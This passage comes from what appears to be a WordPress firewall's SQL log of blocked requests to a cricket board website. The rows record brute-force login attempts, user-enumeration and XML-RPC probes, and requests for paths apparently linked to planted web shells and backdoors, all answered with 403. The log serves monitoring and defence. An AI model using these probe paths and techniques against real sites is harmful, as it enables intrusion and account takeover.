Safari\\/537.36\",\"2\":\"www.google.com\"}','thCdEOMpIT3VZjG8ur1Q2aoH',0,1674477147.6393,109,'','GET',403,0,700,0,1,'',0),('20.245.185.110',351648110,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','8tdjmYUliVa6nNTBHxFSusCr',0,1674485715.4681,139,'','GET',403,0,520,0,1,'',0),('103.74.120.192',1732933824,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','opGVbhWTIOzvRsPqdgZS3Jxe',0,1674490265.5466,146,'','POST',403,0,600,0,1,'',0),('81.88.52.205',1364735181,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','U6tGqgX92uo1cpDzMvAxW4yR',0,1674498791.3724,381,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','gW7RcfokiCUbs8I2dmE6B4hV',0,1674505357.1560,277,'','POST',403,0,600,0,1,'',0),('146.56.99.136',2453169032,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','fTZpIRgSNFo4i0nQ1CYP8X2w',0,1674510837.5958,140,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','1uEn0Iwzb79xUf4ghljvOomJ',0,1674516622.1984,177,'','POST',403,0,600,0,1,'',0),('120.27.133.69',2015069509,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','9wWj4TcS13MXOKZF7CpQzJtg',0,1674530823.5398,842,'','POST',403,0,600,0,1,'',0),('45.61.187.99',759020387,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','ymhnSWH5DZg3Iu68MQePEd0w',0,1674535732.8976,243,'','POST',403,0,600,0,1,'',0),('20.226.49.151',350368151,'','https://yorkshirecricketboard.org.uk/mt/mt-xmlrpc.cgi','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4GkJrTsn0NpKgCqQU2iLyHFl',0,1674536402.0924,131,'','GET',403,0,700,0,1,'',0),('20.226.49.151',350368151,'','https://yorkshirecricketboard.org.uk/cgi_bin/mt/mt-xmlrpc.cgi','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','atyM0i2GkxmdZO4LjYKVChNU',0,1674536405.1032,112,'','GET',403,0,700,0,1,'',0),('20.226.49.151',350368151,'','https://yorkshirecricketboard.org.uk/cgi/mt/mt-xmlrpc.cgi','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Y9DCdm1ayfZjIGglqh4TScJW',0,1674536407.6540,118,'','GET',403,0,700,0,1,'',0),('20.226.49.151',350368151,'','https://yorkshirecricketboard.org.uk/jp/mt/mt-xmlrpc.cgi','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ZuQ8EVi31Lcxpq6RdJWzw5OH',0,1674536411.2309,113,'','GET',403,0,700,0,1,'',0),('20.226.49.151',350368151,'','https://yorkshirecricketboard.org.uk/blog/mt/mt-xmlrpc.cgi','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sI1xBU2pAHStlMm3TyeoGvFJ',0,1674536414.0109,164,'','GET',403,0,700,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','GQ8nVYlZ1zer3bNihMFwHEKS',0,1674536414.1184,157,'','POST',403,0,600,0,1,'',0),('209.141.45.47',3515690287,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','7ILKtOQHSZsoUuMjErX4qYwd',0,1674537840.3238,145,'','POST',403,0,600,0,1,'',0),('107.189.6.203',1807550155,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','04C5imwAFMEokhduURZlYTj7',0,1674539210.9140,142,'','POST',403,0,600,0,1,'',0),('45.61.188.188',759020732,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','wc7LlMq9jfPsXdGQIzpgRV8n',0,1674539233.1850,130,'','POST',403,0,600,0,1,'',0),('199.195.253.123',3351510395,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','n6ze03WHCZQAgDjhfsYPlcVu',0,1674539855.4760,116,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4895.86 Safari\\/537.36\"}','lat37s6J0wQEBXAOufcUmxVg',0,1674546126.3421,156,'','POST',403,0,600,0,1,'',0),('212.192.24.22',3569358870,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','0KolAWL32C9dDuZQEXsxyvY4',0,1674547996.4266,154,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','kztN6wv7C19iLDdgESxOH5Uo',0,1674549287.8392,125,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zxQaIkTtdWlgBDH0hS4ebN3G',0,1674549448.3032,118,'','POST',403,0,600,0,1,'',0),('104.244.77.192',1760841152,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','9CMGhHcYb8R2foFg3jQIJDlU',0,1674551120.8353,163,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.74.9 (KHTML, like Gecko) Version\\/7.0.2 Safari\\/537.74.9\"}','53a0KsBtIYu4f1hok7CnvWgM',0,1674552383.0491,463,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','wR1zkxsPHVQjTInW3FGr45Bm',0,1674554947.3275,109,'','POST',403,0,600,0,1,'',0),('209.141.43.56',3515689784,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','VsTj7mM5fcyObQ2dNZBJoeCh',0,1674560270.5498,185,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','wA0zYtuMisoZSfXHaklbC5gW',0,1674563591.3547,114,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','ySnasGChN7JKuqftLWYwcpMl',0,1674563995.4530,212,'','POST',403,0,600,0,1,'',0),('113.66.32.252',1900159228,'','https://yorkshirecricketboard.org.uk/wp-includes/id3/license.txt/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','qcCjdPa90NF1ryokK8H46fTZ',0,1674566652.1368,112,'','POST',403,0,700,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','6UxipsfE3kQOgm0Zz4ch9b1V',0,1674568704.3082,130,'','POST',403,0,600,0,1,'',0),('198.98.49.240',3328324080,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','m7IrdDzUTNVE8S3GfbHtKxZ6',0,1674571840.5722,158,'','POST',403,0,600,0,1,'',0),('87.249.133.72',1475970376,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3198.0 Safari\\/537.36 OPR\\/49.0.2711.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/wp-login.php\"}','71jvoMrJxN8SXE3WqVAOQ5sR',0,1674574307.5383,146,'','POST',403,0,600,0,1,'',0),('207.154.248.39',3483039783,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','v8LmQaX64AKzSEtVoDZBnxWy',0,1674575069.2596,134,'','POST',403,0,600,0,1,'',0),('106.52.120.186',1781823674,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','s3NhWEKdqtGMmBJeZ84VXji0',0,1674583338.8088,258,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','GTnKSEOg5jsV38P6U0tALrIv',0,1674597073.0118,192,'','POST',403,0,600,0,1,'',0),('20.203.142.20',348884500,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','fD48YKxCFWwubHikNRX57SsG',0,1674599428.1701,116,'','GET',403,0,520,0,1,'',0),('51.255.81.60',872370492,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','FBvm36egu1MAQWEXxzN9V0a4',0,1674602501.2477,340,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','RiTOpbrxI30vA79QfEVWdewc',0,1674605734.0773,117,'','POST',403,0,600,0,1,'',0),('209.141.37.194',3515688386,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.114 Safari\\/537.36\"}','TAK9Dk5Hmd1aOhX4fnSMyFji',0,1674606325.6270,138,'','POST',403,0,600,0,1,'',0),('209.141.49.253',3515691517,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','LiDTXCxBIqn8JM2sPg5o4Zam',0,1674614036.3840,213,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','7bVqOvIS5lsQXrZxyu9CFEdn',0,1674615278.4149,538,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','ETUeWncYls0kXZJo3RB5GLP4',0,1674621622.0762,251,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','7Hf865ijWxPa3It4eBCElonw',0,1674632440.9657,128,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','42Wuf19GbcPlrsvMpIztZoHe',0,1674632818.5823,103,'','POST',403,0,600,0,1,'',0),('188.165.33.50',3164938546,'','https://yorkshirecricketboard.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','yzTGD81QnoSL6CxiMKfEgmkB',0,1674633651.1524,89,'','GET',403,0,700,0,1,'',0),('188.165.33.50',3164938546,'','https://yorkshirecricketboard.org.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','eO3cL0uNYA4xkq2wtIhGQWUF',0,1674633651.4026,102,'','POST',403,0,700,0,1,'',0),('188.165.33.50',3164938546,'','https://yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TBn2xKkIRDoU3sYdZva1qj9P',0,1674633651.6387,90,'','GET',403,0,700,0,1,'',0),('188.165.33.50',3164938546,'','https://yorkshirecricketboard.org.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WqdN6YoQU0K2fZvIX7u5jpr4',0,1674633651.8759,94,'','GET',403,0,700,0,1,'',0),('188.165.33.50',3164938546,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','tZFuiHgvELTxo7fVWe6rhpCl',0,1674633651.9922,108,'','GET',403,0,700,0,1,'',0),('45.61.188.225',759020769,'','https://yorkshirecricketboard.org.uk//wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','yB1v7hkXbaIUHMLg2lKDdPTW',0,1674636544.7244,124,'','GET',403,0,520,0,1,'',0),('188.34.183.184',3156391864,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','PUpTSYvBQ6015NdlwDkz3c7A',0,1674636944.2702,197,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.74.9 (KHTML, like Gecko) Version\\/7.0.2 Safari\\/537.74.9\"}','yDjxL5FmzbVGHPsMZB4OrvYX',0,1674640100.6403,115,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','lyBGESo923nTJu4gjVQq7Lbt',0,1674640316.1854,171,'','POST',403,0,600,0,1,'',0),('209.141.52.244',3515692276,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/538.46 (KHTML, like Gecko) Version\\/8.0 Safari\\/538.46\"}','mC4PuXTQpAnZ1B3qcEWf9oNI',0,1674640641.7269,113,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','GYleZUWFPTqzKxtnf5Qs72h3',0,1674640966.3132,119,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','wtjLvM5rnE0micplBXbGQAya',0,1674641430.9121,157,'','POST',403,0,600,0,1,'',0),('143.198.201.85',2412169557,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.18.4\"}','72G6jRCaunm0J5QqMbplgWUD',0,1674645621.4770,164,'','GET',403,0,700,0,1,'',0),('143.198.201.85',2412169557,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.18.4\"}','qgMDZ8KN4auvPVYCHydIzojL',0,1674648641.9204,109,'','GET',403,0,700,0,1,'',0),('67.223.118.61',1138718269,'','https://yorkshirecricketboard.org.uk/wordpress/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','j3wmtl6eWXfFyQzriKEv9dCh',0,1674651784.6230,929,'','POST',403,0,700,0,1,'',0),('67.223.118.61',1138718269,'','https://yorkshirecricketboard.org.uk/wp/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','aKOm8ACoQdigftZPFGpwY0UD',0,1674651786.2349,928,'','POST',403,0,700,0,1,'',0),('42.200.109.156',717778332,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','Vg3MIK5BiudG6H0y4wlYNk8J',0,1674666764.6400,101,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/99.0.4844.84 Safari\\/537.36\"}','9vXxWpCh3rjUnBSY46ysd8Ge',0,1674673498.2024,181,'','POST',403,0,600,0,1,'',0),('81.70.248.169',1363605673,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','bg3rxh6esMEyUo9O4T1DvJLd',0,1674691003.5789,286,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4895.86 Safari\\/537.36\"}','bA52CFM31hUQGYwnSXmrLDVZ',0,1674694294.0914,123,'','POST',403,0,600,0,1,'',0),('167.172.206.144',2813120144,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','ikmIr2OKlW7LcY9NsnjwFMSR',0,1674699200.9677,203,'','POST',403,0,600,0,1,'',0),('185.2.4.134',3103917190,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','LpqsumzG6VvX8U9PcbBFiNYZ',0,1674703794.8120,634,'','POST',403,0,600,0,1,'',0),('103.18.247.36',1729296164,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rJ8KtioDNcpkeIf1UFalbERs',0,1674704577.6607,178,'','POST',403,0,600,0,1,'',0),('63.135.182.111',1065858671,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OA6mCiFsWjMcD3UtfZTKyX1w',0,1674705966.9544,139,'','POST',403,0,600,0,1,'',0),('116.0.21.74',1946162506,'','https://yorkshirecricketboard.org.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','DlRbZpe4E0PvNrLF7kh1Ous5',0,1674707596.1377,121,'','GET',403,0,700,0,1,'',0),('116.0.21.74',1946162506,'','https://yorkshirecricketboard.org.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','H92ui3zMnIENT65GsQoCcePL',0,1674707596.1233,144,'','GET',403,0,700,0,1,'',0),('157.230.15.115',2649100147,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','whlxHs9VCzL4SZaIcuArkmBj',0,1674708474.6404,355,'','POST',403,0,600,0,1,'',0),('104.244.77.229',1760841189,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','XqNI8gdaP1rnlSei3c4k9jKF',0,1674710528.7600,138,'','POST',403,0,600,0,1,'',0),('164.132.170.4',2760157700,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','GmJeWjcYF9BqZHDlX4wTpanE',0,1674717655.3547,130,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','Hf6uYW9mtiaU0DyLvjEAeo5l',0,1674720746.8846,112,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','krIAot0PgO8G5lsmUeJ6MypZ',0,1674721113.3606,122,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','FpiIgvGeOQaMsNBRCYJVzxbE',0,1674722859.1165,163,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11B554a Safari\\/9537.53\"}','rKUgGjPfZsFoSmJXO8ehti1u',0,1674733604.8566,150,'','POST',403,0,600,0,1,'',0),('209.141.57.46',3515693358,'','https://yorkshirecricketboard.org.uk/adminer.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 